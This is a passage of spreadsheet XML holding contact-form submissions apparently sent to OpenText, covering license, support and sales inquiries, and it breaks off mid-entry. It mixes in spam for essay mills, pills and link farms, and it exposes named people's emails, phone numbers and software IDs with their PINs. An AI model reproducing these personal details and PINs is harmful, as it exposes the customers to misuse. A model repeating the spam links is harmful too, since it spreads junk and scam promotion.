I would like to get a quotation for our exceed license's maintenance for 01.03.2018 - 30.04.2018. Could you please send it to my e-mail adress?</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for the blog, it's packed with a lot of useful information. Reading this helped me a lot. _x000D_
http://blackmarlin.co.za/made-to-order-essay-publishing-products-rated-by/_x000D_
http://stevenrgerst.com/b43-wb/44/articles-nydpoZK-142/function.session-start/page/function.include/page/3_x000D_
</t>
  </si>
  <si>
    <t>I'm seeking for a DCM solutions for my customer.</t>
  </si>
  <si>
    <t xml:space="preserve">I have tried to receive current License Keys for Brava Desktop software._x000D_
I used account email piotr.jarosz@fwpl.fwc.com _x000D_
_x000D_
But last time we have changes in our organisation. I have tried to update email to current piotr.jarosz@shi-g.com but now support system doesn't show our license and I can't get updated licenses._x000D_
_x000D_
_x000D_
Those are our license:_x000D_
Software ID: a036000000kRq0l_x000D_
Software PIN: 376550_x000D_
Account: Foster Wheeler Energia Polska Sp. z o.o._x000D_
Usage: (not specified)_x000D_
Seat(s): 1_x000D_
_x000D_
Software ID: a036000000kRq0v_x000D_
Software PIN: 376551_x000D_
Account: Foster Wheeler Energia Polska Sp. z o.o._x000D_
Usage: (not specified)_x000D_
Seat(s): 1_x000D_
_x000D_
_x000D_
Software ID: a036000000kRq0q_x000D_
Software PIN: 371234_x000D_
Account: Foster Wheeler Energia Polska Sp. z o.o._x000D_
Usage: (not specified)_x000D_
Seat(s): 1_x000D_
</t>
  </si>
  <si>
    <t>Hello, Can you please confirm if Brava Desktop Version 6.2 is compatible/supported on Windows 10?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Please call to discuss solution options and provide quotation. </t>
  </si>
  <si>
    <t>Good morning, my company recently purchased 10 licenses for brava desktop and I was assigned contact and administrator. I received an email with instructions on how to download the license keys as well as the installer for the software itself, but when I follow the instructions on the email (must go to mysupport &gt; accounts &gt; activations/keys) I get a message saying that I do not have access to that area because my account is not verified (I can access my support, this appears when clicking the "activations/keys" link). I did verify my account at the beginning of the week so I don't know how to procceed. _x000D_
PS: English is not my first language and I'd appreciate an email instead of a phone call if possible!</t>
  </si>
  <si>
    <t>I purchased a licence for Exceed version 8 from Hummingbird quite a few years ago, and it's been working fine for me.  I now need to move to Windows 10, and I would like to try out the latest version of Exceed for Windows 10.  (a) Do you have an evaluation version of Exceed I can test with? and (b) what is the price to upgrade to the latest version of Exceed?_x000D_
_x000D_
Thanks,_x000D_
Michael</t>
  </si>
  <si>
    <t xml:space="preserve">It is my very first time visiting your site and I'm very fascinated. Thank you for sharing and keep up ;) _x000D_
http://geoinwest.eu/?p=1249_x000D_
http://stevenrgerst.com/c26-wn/48/articles-nydpoZT-42/function.include_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi! I'd like to enquire about sponsorship opportunities for your upcoming forum. Also, is it free to attend the exhibition and sessions? If not, what is the cost? We are looking to have two people attend. Thanks! </t>
  </si>
  <si>
    <t xml:space="preserve">Whoa! This may be one of the most helpful things on the subject I have ever found. Thanks for your hard work. _x000D_
http://stevenrgerst.com/s59-no/54/articles-nydpoNZ-19351/page/2_x000D_
http://stevenrgerst.com/c24-cq/74/articles-nydpoAM-2867/function.include/page/function.include_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">it's a really great resource!So much useful info and handy ideas, bless you =) _x000D_
http://stevenrgerst.com/g42-of/97/articles-nydpoLD-5289/page/8/function.include/page/function.session-start_x000D_
http://stevenrgerst.com/fhgbv/12/6682-fjh-juy4875-0608.html/page/2/function.session-start/_x000D_
</t>
  </si>
  <si>
    <t>Which of your Pdf products supports OLE Automation? Please reply via email. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">   We make sure you need to do not skip your deadlines | Our hurry essays provider delivers complete and finished essays which are personalized penned as many as your specific requirements ._x000D_
 _x000D_
http://wendellberryessaysbox65.blog5.net/8749613/best-judgement-for-all-your-writing-requirements_x000D_
</t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
I'm trying to reset my password and I keep getting an error message when I try and confirm the new password? It just says 'Error saving password' or something.</t>
  </si>
  <si>
    <t xml:space="preserve">I've seen something very similar in another thread. You will probably find some parts of that post helpful, not everything obviously, but I still think it is worth checking out. _x000D_
http://jabrooks.blogs.ccps.us/author/jabrooks/page/19/_x000D_
http://infinityliving.ca/author/sadmin/page/8/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am evaluating documentation tools for our product documentation team. We have a list of requirements, and I would like to request sales assistance to evaluate our requirements and help us determine if your solution meets our business needs. Thank you! Carem </t>
  </si>
  <si>
    <t>Interested in document management for Corporate Legal Department</t>
  </si>
  <si>
    <t>Partner program info</t>
  </si>
  <si>
    <t xml:space="preserve">      The fraudulent essay    community must be outlawed,    main    lecturers and lords have urged as figures obtained by    reveal._x000D_
 _x000D_
http://cheapwriting36.myblog.de/cheapwriting36/art/9514323/-Recognizing-in-regards-to-the-benefits-of-on-the-net-essay-writing-solutions-_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are currently shopping for CMS solutions to support RIA (Registered Investment Advisor) firms. Can you please suggest what Vendor support all the below-listed contents and features. Also, is there a price quote you can provide and the details on if the price is based on a single license or for multiple users of an Organization. Any additional information on technology, deployment etc will be helpful._x000D_
_x000D_
Contents_x000D_
Blogs_x000D_
Calculator - Retirement Calculator, Investment Calculator, Annuity investment calculator_x000D_
Data - Streaming market data, real-time analytics and robust charting _x000D_
Curated Content_x000D_
News_x000D_
eNewsletter_x000D_
Events_x000D_
Expert Interviews_x000D_
Guides_x000D_
Infographics_x000D_
Videos and Images_x000D_
Monthly Drawings_x000D_
Presentation Slides_x000D_
Templates_x000D_
Tip Sheets/Product Cut Sheets/Cutsheets_x000D_
Tutorials_x000D_
Whitepapers _x000D_
Brochures_x000D_
Case Studies_x000D_
Catalogs_x000D_
Comparison Charts_x000D_
FAQs_x000D_
Original Research_x000D_
Podcasts_x000D_
Price Points Page_x000D_
Product Specs_x000D_
Product Videos_x000D_
Reviews and Testimonials_x000D_
Webinars_x000D_
Consultations/Chat with Representative_x000D_
Demos_x000D_
_x000D_
Features_x000D_
Modular Structure_x000D_
Easy Content Management_x000D_
Permission Control_x000D_
Extended Plugins &amp; Themes_x000D_
High Performance and scalability_x000D_
Extensibility and integration_x000D_
Stability of the system_x000D_
Easy-to-use for content editors and site administrators_x000D_
Advanced security management_x000D_
Advanced workflow and approval process_x000D_
Online marketing tools_x000D_
"Multisite support or login to different sites such as_x000D_
Black Diamond_x000D_
DocuSign, Salesforce, Envestnet - Finance Logix_x000D_
Laser App Anywhere,Laserfiche, Morningstar, Orion Advisor Services, Redtail Technologies_x000D_
"_x000D_
Multilingual support (Optional)_x000D_
Support for mobile devices_x000D_
Training services available_x000D_
24/7 highly responsive support_x000D_
Reliable bug fixing policy_x000D_
Easily upgradable and clear upgrade path  _x000D_
Thanks_x000D_
Pam_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">it's a really great resource!A lot of helpful information and handy tips, thanks =) _x000D_
http://stevenrgerst.com/r54-dq/76/articles-nydpoDL-36509/page/function.session-start_x000D_
http://stevenrgerst.com/i46-da/15/articles-nydpoJR-4287/page/function.include/page/2_x000D_
</t>
  </si>
  <si>
    <t>Is an install of OpenText hostexplorer support on a server (such as windows server 2008 or 2012)? Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I need to add a new GS1 to our account. Im not sure how to do this? (QR96A for HATLEY LITTLE BLUE HOUSE (125142720989) </t>
  </si>
  <si>
    <t>I am looking to connect with the Opentext sales person responsible for Morgan Lewis in Philadelphia, PA.</t>
  </si>
  <si>
    <t xml:space="preserve">Not too long ago I have come across one article which I think you might find interesting. Someone will take a steaming dump all over it, however it clarified some of my questions. _x000D_
http://stevenrgerst.com/f28-cb/79/articles-nydpoNT-336/function.session-start/page/3_x000D_
http://www.reshmidhagey.com/where-to-get-top-notch-term-paper-writing-service/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">   We provide the best possible essay companies on the net for college students which have been battling and which have experienced a small little bit of bad luck | We help them to order the highest quality essays._x000D_
 _x000D_
http://wallinside.com/post-62783341--proper-remedies-for-your-creating-requires-.html_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be intersted in acquiring  list of top decision makers from Pharmaceutical  industry ?_x000D_
_x000D_
This list inculudes permission based business email address and complete business contact information._x000D_
_x000D_
This list has been Verified and ready to Acquire._x000D_
_x000D_
Feel free to let me know  your thoughats on the same ._x000D_
_x000D_
Thanks and Regarding_x000D_
tanya Williams              _x000D_
Business Development Executive _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My colleague and I are looking at invoice automation solutions for Endo Pharmaceuticals Inc., headquartered in Malvern, Pennsylvania.  The ideal solution should interface with Coupa, SAP, &amp; JDE, the company’s P2P application and ERP systems.  We are working on a very aggressive timeline and would like to discuss your company’s solutions in greater detail.  Below are topic points we would like to begin our discussion.  This is an informal conversation that could lead to a formal RFQ._x000D_
_x000D_
SOFTWARE:_x000D_
•	Cost of the software_x000D_
•	Time to install and configure the software_x000D_
•	Training the software to recognize invoice formats_x000D_
•	Data export to ERP/COUPA_x000D_
•	User and admin training_x000D_
•	IT infrastructure and maintenance costs_x000D_
SCANNER:_x000D_
•	Number of daily scans_x000D_
•	Color scanning capability_x000D_
•	Interface type (Connection to computers)_x000D_
•	Maximum paper size_x000D_
•	Auto crop capability_x000D_
•	Auto feed capability_x000D_
_x000D_
We respect your knowledge in this field and are open to any other points you consider important that we may not have mentioned above.  We would be most appreciative of a telephone call or email reply to let us know of your interest._x000D_
_x000D_
Your company was provided to us from internal sources here at Endo.  If you are not the proper person, kindly forward this email to who would be best to start a dialog with us.  Our contact information is below.  We look forward to hearing from you.  Thank you for considering this request._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Sridhar Ramaswamy_x000D_
Associate Director | Enterprise Applications | SAP _x000D_
Cognizant Technology Solutions_x000D_
1400 Atwater, Malvern  PA_x000D_
Phone | (919) 302-9814_x000D_
Ramaswamy.Sridhar@Endo.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need a quote and lead-time for the following parts._x000D_
_x000D_
Item.	Part Number	Description	Qty.	Unit Measure_x000D_
1	OTRF-CHUP-FE	RIGHTFAX IP-ENABLED ADDITIONAL FAX	2	EA_x000D_
2	OTRF-ISUP	OPENTEXT INCREMENTAL ASP STD SUPP.	1	EA_x000D_
3	PS-RL003	REMOTE INSTALLATION AND CONFIG SVC	1	EA_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t>business proposal in Bangladesh real estate market</t>
  </si>
  <si>
    <t xml:space="preserve">HIPAA FAX Service Hosted </t>
  </si>
  <si>
    <t>Confirmation that the support renewal has been processed</t>
  </si>
  <si>
    <t>Getting a lot of requests for Sharepoint.  Just wanted to understand more about the plugin.</t>
  </si>
  <si>
    <t>Buena tarde_x000D_
Quiero solicitarles una cotización del software OpenText Gupta Team Developer 7.0 en cuanto sale la licencia._x000D_
Saludos.</t>
  </si>
  <si>
    <t>We have a customer that uses the OpenText RightFax 10.6 API.  We cannot find documentation for this API for version RightFax 16.2.  Is this API still supported?  Does the 10.6 API guide still apply?</t>
  </si>
  <si>
    <t>We are new supplier for Toys R Us, and wanted to apply EDI for receiving new orders from the system.</t>
  </si>
  <si>
    <t>We are looking to find an EDI provider that is capable of dealing with EDI 810's, 850's, 997's and maybe 820's, as well as having compatibility with SCC14 barcodes. We are a small company, so cost effectiveness is definitely a factor. What options do we have if we go through OpenText and what are we looking at for pricing? _x000D_
Thanks so much!</t>
  </si>
  <si>
    <t xml:space="preserve">   Get rolling while using top Essay Composing Services about | Basically send out us your essay dilemma, and we are going to track down an expertly competent author to develop a solution like._x000D_
 _x000D_
http://philosophyessay44.blog5.net/8730927/what-is-better-essay-writing-by-yourself-or-using-online-writing-service_x000D_
</t>
  </si>
  <si>
    <t>I'm looking for a content management system that lets multiple tech writers access Framemaker source files without clobbering each other's changes.</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry for off-topic, I am considering about building an instructive web site for kids. Will possibly commence with submitting interesting facts such as"Some people say that when the black bands on the Woolybear caterpillar are wide, a cold winter is coming."Please let me know if  you know where I can find some related information and facts such as here_x000D_
 _x000D_
http://stevenrgerst.com/t17-kz/18/articles-nydpoSG-2158/page/3_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext team,_x000D_
_x000D_
I was hoping you would be able to help me out while I gather information. Do you offer Concurrent Licensing for the following SW. A quick Yes/No for each would greatly help out!_x000D_
_x000D_
eDRG_x000D_
Documentum_x000D_
Brava_x000D_
Kazeon_x000D_
Content Bridge_x000D_
</t>
  </si>
  <si>
    <t>We need access to the official product documentation, support notes and forums of the developer community</t>
  </si>
  <si>
    <t xml:space="preserve">why I can´t to acess to my support; the system always send me that we need to "Request Confirmation Email" and I can´t to enter at mysupport </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
One of my clients is looking for a vendor-neutral archive for the Websphere clinical record portion of MedSeries4 system._x000D_
Can you assist us?_x000D_
Thank you,_x000D_
Sharon_x000D_
</t>
  </si>
  <si>
    <t>Не стоит также забывать, что вредители могут проникать в жилье через розетки или небольшие щели от соседей. [url=https://xn--80aieocueqr8g.xn--p1ai]где купить квартиру в мытищах[/url] мы представляем подборку, в которой собраны все новые новостройки москвы и московской области. [url=https://xn--80aieocueqr8g.xn--p1ai]жк отрадное официальный сайт[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">   If you would like to order essay papers in Australia and be positive that your essay is initial and drafted to your guidance, our essay producing support is in this article to assist you._x000D_
 _x000D_
http://payforessaywriting2.blog2learn.com/8643981/the-different-types-of-essays-that-on-the-internet-essay-writing-service-handles_x000D_
</t>
  </si>
  <si>
    <t>I would like some general information on Faxing electronically.  How it works with Google Email as the client, and setup options, etc.  Email is the best form of contact.  Any details that you can provide are appreciated.</t>
  </si>
  <si>
    <t xml:space="preserve">The department that I service currently utilizes Content Server (Content Server 10.5 Update 2017-06 (version 10.5.0.2463)) for company record and agreement management.  Another division within the company that an associate works with is looking to consolidate a few different record management systems into just one system.  We are looking to learn more about the modules for enhancing Content Server.  One aspect that was brought up was tracking of financials.  </t>
  </si>
  <si>
    <t xml:space="preserve">I apologize for off-topic, I am considering about creating an informative site for students. Will probably commence with publishing interesting information like"A man will ejaculate approximately 18 quarts of semen in his lifetime."Please let me know if  you know where I can find some related information and facts like here_x000D_
 _x000D_
http://stevenrgerst.com/g18-en/57/articles-nydpoJB-184/function.include/page/2_x000D_
</t>
  </si>
  <si>
    <t>I have some questions regarding Exceed 3D and Exceed Turbo X_x000D_
-Can you install Exceed 3D onto an install of Exceed TurboX_x000D_
-Does Exceed TurboX have the 3D features on its own?_x000D_
-Does Exceed TurboX support OpenGL rendering that's required to remote into RedHat 7 from Windows?</t>
  </si>
  <si>
    <t>Require pricing on OpenText 3270 emulator.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for training for the following software...OpenText TrustedLink™ System i (TLi) for the IBM system i and i5 platforms_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
I have some questions about ApplicationXtender. We’ve been using it for many years and currently we are upgrading version 7.0 to 8.1._x000D_
_x000D_
We’d like to get some information regarding the next major release, like ApplicationXtender 9.0. We are interested in new features, components, etc._x000D_
_x000D_
Our main concern is: to have application with automated retention capability. We’d like to get some information if you are planning to change/improve something about retention capability in ApplicationXtender, as well as other features._x000D_
_x000D_
It would be great, if we can schedule some presentation (conference call, WebEx, etc.). If possible, we’d like to schedule one after February 25th._x000D_
_x000D_
I appreciate your response and help._x000D_
_x000D_
_x000D_
_x000D_
Marek Matusek_x000D_
Document Control Technician_x000D_
Polish &amp; Slavic FCU_x000D_
9 Law Drive_x000D_
Fairfield, NJ 07004_x000D_
973-808-3240 ext. 6188_x000D_
</t>
  </si>
  <si>
    <t>Purchased a new Brava Reader Software and maintenance agreement. I can not down load or access my account. Please assist._x000D_
_x000D_
Software ID E7A58C6E2D42493FBEF5916E54BEC7EA, PIN IGC460233</t>
  </si>
  <si>
    <t>Would like to schedule a demo of the tool for next week</t>
  </si>
  <si>
    <t>hello, Please help ._x000D_
I sent you a mail from LCL compagnie at 15h14 today.  Our references :_x000D_
Code Client : FR01-34501001_x000D_
Référence client : FRSC-10401_x000D_
N° de Contrat : 179269_x000D_
On development site wh’ve got a problem with  IHM ediswit, thanks for you help  _x000D_
_x000D_
1 ) At the begening  when we   do ediswit  -close  (OK)    and  ediswit –load  it gives ther error  = 20_x000D_
2  ) I found a very very large file  which name is  : /home/ediswit/gxs/edidata/TNETDF1   _x000D_
      I erased it and recreate it whith “touch”. I thought that it was a simple log file._x000D_
3  )  ediswit –load   :_x000D_
ud002tmp0001@ediswit /home/ediswit/gxs/edidata $&gt; ediswit -l_x000D_
loading core service: 7.6_x000D_
tipgtable starting_x000D_
Unable to update TNETDF1  , check UNIX ulimit 10_x000D_
Either the whole service has failed to load or a part of the application_x000D_
did not startup correctly. Please check the logs under the directory_x000D_
logfiles for possible causes._x000D_
_x000D_
4 )   on this directory  : _x000D_
ud002tmp0001@ediswit /home/ediswit/gxs/edidata $&gt; ls -ltr_x000D_
total 108856_x000D_
-rwxr-xr-x    1 ediswit  pee_admi       3072 Dec 11 2000  TNETSF.idx_x000D_
-rwxr-xr-x    1 ediswit  pee_admi       1382 Dec 11 2000  TNETSF_x000D_
-rw-r--r--    1 ediswit  pee_admi       5120 Jan 31 2013  TNETREL.idx_x000D_
-rw-r--r--    1 ediswit  pee_admi     126004 Jan 31 2013  TNETREL_x000D_
-rwxr-xr-x    1 ediswit  pee_admi      37888 Feb 25 2013  TNETUF.idx_x000D_
-rwxr-xr-x    1 ediswit  pee_admi       9216 Mar 19 2014  TNETCF.idx_x000D_
-rwxr-xr-x    1 ediswit  pee_admi      52752 Mar 19 2014  TNETCF_x000D_
-rwxr-xr-x    1 ediswit  pee_admi    3581148 Jan 24 12:30 TNETQF_x000D_
-rw-r--r--    1 ediswit  pee_admi     676864 Jan 26 00:00 TNETPB.idx_x000D_
-rw-r--r--    1 ediswit  pee_admi     357416 Jan 26 00:00 TNETPB_x000D_
-rwxr-xr-x    1 ediswit  pee_admi     464896 Jan 28 19:14 TNETQF.idx_x000D_
-rw-------    1 ediswit  pee_admi       9216 Jan 29 00:00 TNETMB.idx_x000D_
-rw-------    1 ediswit  pee_admi      20564 Jan 29 00:00 TNETMB_x000D_
-rwxr-xr-x    1 ediswit  pee_admi   20967309 Feb  8 11:37 TNETDF2_x000D_
-rw-r--r--    1 ediswit  pee_a</t>
  </si>
  <si>
    <t xml:space="preserve">I would like a quote for the Cloud Fax service. We have 6 fax lines that would need to be ported and each line will have about 5 to 10 users where the users cannot access other fax line's history for confidentiality. The usage varies between the 6 lines, but it would be around 200 or less faxes per month total. We need to be PCI compliant, which factors into which users can access which fax lines. I'm getting quotes from many fax services and would rather have an email detailing the prices and avoid phone calls at this time._x000D_
</t>
  </si>
  <si>
    <t>We are interesting in OpenText Analytics Suite and would like to see how can it fit our product._x000D_
Please send an email of relevant contact so we can set a meeting._x000D_
Thanks.</t>
  </si>
  <si>
    <t>license Brava DWG view</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sorry for off-topic, I'm thinking about creating an instructive web-site for young students. Will possibly commence with publishing interesting information such as"Thirty-five percent of the people who use personal ads for dating are already married."Please let me know if  you know where I can find some related information like here_x000D_
 _x000D_
http://stevenrgerst.com/fhgbv/24/3783-fjh-juy4875-0608.html/page/function.session-start_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the blog, it truly is packed with a lot of helpful info. This helped me a lot. _x000D_
http://essayorderonline21.jiliblog.com/8546011/excellent-resolution-for-all-your-writing-requirements_x000D_
</t>
  </si>
  <si>
    <t>Hello, The company I work for were previously called Hitec Laboratories Ltd (Slough in UK), but we were bought out by another company called Mitratech Holdings.  We (Hitec) have support for the PixTools product, but we used to login for that via EMC.  I spoke to them this morning and they said OpenText now handle the PixTools products for downloads and Support._x000D_
_x000D_
How can I/we gain access to downloads and support for PixTools now that our company name has now changed?  I would have tried registering/logging in as the hiteclaboratories email address, but I no longer have access to that email address._x000D_
_x000D_
Any help would be greatly appreciated.  I have registered an account at OpenText under the email address of andy.gleed@mitratech.com.</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi,_x000D_
 We're looking to upgrade our Network Infrastructure,Can someone Send_x000D_
 me an email to fix a time to discuss?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am sorry for off-topic, I'm considering about creating an informative web-site for college kids. Will possibly start with posting interesting facts just like"The Beetham Tower cost over ВЈ150 million to build."Please let me know if  you know where I can find some related info like right here_x000D_
 _x000D_
http://stevenrgerst.com/fhgbv/24/4401-fjh-juy4875-0608.html/page/2_x000D_
</t>
  </si>
  <si>
    <t>Hello, this is the first time I've used support since opentext took over documentum.  I',m trying to access the support forums however, it says I do not have permissions.  My username in the EMC world was garytreble.  Can you please advise as we have an urgent issue we need to resolve.</t>
  </si>
  <si>
    <t>[url=http://www.socialvoice.club/lead-magnet3fpnduch][img]https://c.radikal.ru/c30/1801/73/bc6f49a1cb2d.jpg[/img][/url] _x000D_
 _x000D_
[url=http://www.socialvoice.club/lead-magnet3fpnduch]Get 63% OFF! MOST comfortable bicycle seat! _x000D_
Designed to fit all sizes of standard bicycle seat including exercise training bikes. _x000D_
Made with silicone gel this seat cover with be sure to have you riding for days! _x000D_
[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">OEM SOLUTIONS FOR STARTUPS_x000D_
_x000D_
Dear Sir or Madam,_x000D_
_x000D_
My name is Rodrigo Antepazo. I would appreciate if you could send me information about your OEM Solutions Program for Startups._x000D_
_x000D_
Please, contact only by email._x000D_
_x000D_
Best regards,_x000D_
Rodrigo Antepazo_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am an independent consultant and currently have several clients asking me about CMS solutions.  They require to implement a group-wide standard with re-usable assets but also the ability for divisions, countries etc to be able to implement local designs that inherit from the core.  They are also very keen to understand hosting options and how they would integrate with their own systems / migrate from their old systems.  Would you be able to send me some information to help with the evaluation please?</t>
  </si>
  <si>
    <t xml:space="preserve">Trust you are doing very well. _x000D_
Do you provide SAP Solutions? _x000D_
If YES, then we have 12,471 customers database of SAP from UK. _x000D_
You can share your interested criteria to slice down the database by Vertical, Geographical area, Industry, Revenue etc… _x000D_
You can use this extensive database for consulting purposes and other upgrades. _x000D_
Test database will be given to review and check the quality. _x000D_
For more information please get back to us. _x000D_
Cheers!!! _x000D_
Lydia Donald _x000D_
(E):- lydia.donald@zomo-online.com_x000D_
</t>
  </si>
  <si>
    <t>I have lost access to knowledge.opentext.com. I have to repeatedly confirm my email address and even after that my access is lost. Need access to raise support tickets. Please help at the earliest</t>
  </si>
  <si>
    <t xml:space="preserve"> By dealing together, you both can address problems of self-esteem and mutual trust.  He is content, as well as the complete opposite of our thoughts final years has in store for us. _x000D_
https://www.cialissansordonnancefr24.com/tadalafil-costa-rica/ </t>
  </si>
  <si>
    <t>No access to download software from My Support after confirming registration twice now.._x000D_
Can I please be granted access?</t>
  </si>
  <si>
    <t xml:space="preserve">I was trying to active "MY support" , have tried multiple times. by clicking on confirmation link received in my IBM email id. Every time it says support team will confirm once your my support is active. Till date I didn't receive any confirmation email. </t>
  </si>
  <si>
    <t>A reflected cross-site scripting vulnerability discovered for Vignette Web Portal version 8.1. Request for confirmation.</t>
  </si>
  <si>
    <t>We are currently using OpenText ECM hosted on parent company servers based in the UK. Our plan is to move the system to new servers based in Australia to improve connectivity and download speeds._x000D_
Our systems are supplied through Causeway Technologies in the UK._x000D_
Do you have any recommended technology suppliers/partners in Australia who may be able to host our system for us. We are using document management, forms and workflow, as well as a few Causeway specific functions._x000D_
Many thanks.</t>
  </si>
  <si>
    <t>Need clarity on the availability of the eDOCS DM API functionality. The documentation "eDOCS DM API Samples Guide" we were provided by OT indicates its available on version 10.0 or newer, but we found some information online that says API features are only available on 16.2 or later. Can you please provide clarity, we're currently running eDOCS DM 16.1 and want to automate adding documents to DM via API calls...</t>
  </si>
  <si>
    <t>We're interested in purchasing OpenText and would like to speak to someone about doing so.</t>
  </si>
  <si>
    <t>Dear_x000D_
_x000D_
We're developing a new client with Documentum and we need to integrate brava for .Net applications. Are there any solution for this cases?_x000D_
_x000D_
Our main client is an Oil &amp; Gas Company at Argentina. They have brava for webtop and xCP. Other times, I've spoken with Tim and Leslie for the implementation of the different techonolgies and the costs per users. _x000D_
_x000D_
Regards, _x000D_
_x000D_
Damian</t>
  </si>
  <si>
    <t>(I accidentally used my personal email on my previous contact)_x000D_
I have verified with the trial copy of of Brava! Desktop and would now like to purchase 2 copies  for one of our divisions.  _x000D_
We prefer that you bill us for the items, if possible, which comes to about $118._x000D_
Thank You</t>
  </si>
  <si>
    <t>I have verified with the trial copy of of Brava! Desktop and would now like to purchase 2 copies  for one of our divisions.  _x000D_
We prefer that you bill us for the items, if possible, which comes to about $118._x000D_
Thank You</t>
  </si>
  <si>
    <t>PLEASE BLOCK INCOMING FAX FROM #800-396-9402</t>
  </si>
  <si>
    <t xml:space="preserve"> 16 окт 2016 ... шведская стенкасвоими руками в домашных условиях - Duration:8:12. Гафар Сатторов 10,973 views · 8:12. Как установить шведскую стенку. Мастер-класс от бывшего работника Киевской фирмы Свитанок - Duration: 6:11. Сергей Александрович 33,467 vieews · 6:11 · Опыты Детский спортивный комплекс "Акробат -2   2334  Детский спортивный компелкс "Капитошка" О пользе физичесвких упражнений для детей извесьно всем. Однако все родители знают, насколько сложно бывает убедить чадо сделать зарядку.   &lt;br&gt;  _x000D_
 [URL=http://odrotrens.ml/kovrik-medved/]Коврик медведь[/URL] [URL=http://ru-sport.ga/turniki-dlya-doma-nastennye-dlya-detej-kupit/]Турники для дома настенные для детей купить[/URL]  _x000D_
 Детская ШВЕДСКАЯ СТЕНКА Детский уголок спортивный комплекс 11  undefined отдых » Атлетика undefined фитнес. 1 753 грн. Одесса, Приморский. 10 янв. В избранные  стенки и уголки купить по низкой цене в Киеве и  стенки и уголки в интеррнет магазине InterAtletika. ? +38 044 391 31  цены, гарантия, профессиональняа консультация! Произвожим? Доставляем?  стенка металлическая купить с турником - бесплатная  стенки в Украине. Купить шведскую стенку, тренажер для дома,спорттвный уголок. Фото,  стенка для детей: купить в Киеве, цена в Украине  стенки железные - в наличии. Заказывайте сейчас! Сегодня разнообразиеспортивных тренажеров весьма  беговую дорожку, велотренажер, степпер, гантели в  «Turnik-home» предлагает широкий ассортимент туриков ибрусьев. Контакты.. Наш в России:  &lt;i&gt;Детские площадки Авен в г.  Компания: ООО "Антей". Телефон офиса: +7 (920) 928-57-62. Начальникотдела сервиса и логистики Ольга Юрьевна +79106788032. Ком. директор Андркй Викторович +79307438330. Директор Александр Александрович +79157712781. E-mail:деревянные шведские стенки дял детей в Киеве. НизикеЛенинский. Сегодня 14:16. Не покупайте Шведские  стенки! 5 800 руб. Пока незайдете к нам на сайт! Для взрослых и детей! Нагрузка до 400 кг! Доставка и самовывоз по всей России!О рекламодателе. О рекламодателе. ИП Осип</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Marketing Manager,_x000D_
_x000D_
I would like to send an advertising media kit for _x000D_
Consulting magazine to the correct person at your _x000D_
company, but I am not sure who that might be?  _x000D_
_x000D_
Our digital title reaches C-Level Consultants at Firms in the _x000D_
US and Canada.  They are in all types of consulting fields_x000D_
such as IT, HR, Financial, Operations and Strategy.  _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Questions about ApplicationXtender with the Reports Manager add-on. Is this a stand-alone product or is it an add-on to Documentum.  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are looking for OCR/OMR/handwritten character recolonization vendor who have api which we can use with our product. I do see on your's website has an OpenText Capture Center product which may fit for our business use case. Can you please provide a demo link or provide a point of contact who can help us to understand yours OOC product._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Mahendra Vaghasia</t>
  </si>
  <si>
    <t xml:space="preserve">EDI quote._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We have a few opportunities available on our platform for Business Intelligence with Tier 1 companies._x000D_
_x000D_
If this would be of interest, please send us a message at contact@bizwarehub.com or register directly on the platform at https://www.bizwarehub.com._x000D_
_x000D_
Do not hesitate to propose a call to talk about the opportunities and the platform._x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>I would like to know if the files and data is stored in the cloud or can it be stored at our site?  This is especially true when you look at looking at files using the web or your phone.</t>
  </si>
  <si>
    <t>Hello, I have reached out to XO communication for the below lines and they told me that Easylink Services will have to request the CSR._x000D_
_x000D_
Customer Name:   Betsy and Adam_x000D_
1400 BROADWAY_x000D_
NEW YORK, NY 10018_x000D_
United States_x000D_
_x000D_
BTN: _x000D_
2013564989_x000D_
2013564936_x000D_
2013283354_x000D_
2013283357_x000D_
_x000D_
Can you help by requesting the CSR and then forward to me please.  You can write to them at cmadvocate@xo.com. _x000D_
_x000D_
Here is some supporting info below: _x000D_
_x000D_
__________________________x000D_
From: cmadvocate@xo.com [mailto:cmadvocate@xo.com] _x000D_
Sent: Wednesday, February 07, 2018 11:32 AM_x000D_
To: Trupti Vaidya &lt;Trupti.Vaidya@AlticeUSA.com&gt;_x000D_
Subject: RE: CSR Request: Customer Betsy &amp; Adam [#9327725]_x000D_
_x000D_
Easylink Services is going to have to be the one to request the CSR_x000D_
_x000D_
--Original Message--_x000D_
From: Trupti.Vaidya@AlticeUSA.com_x000D_
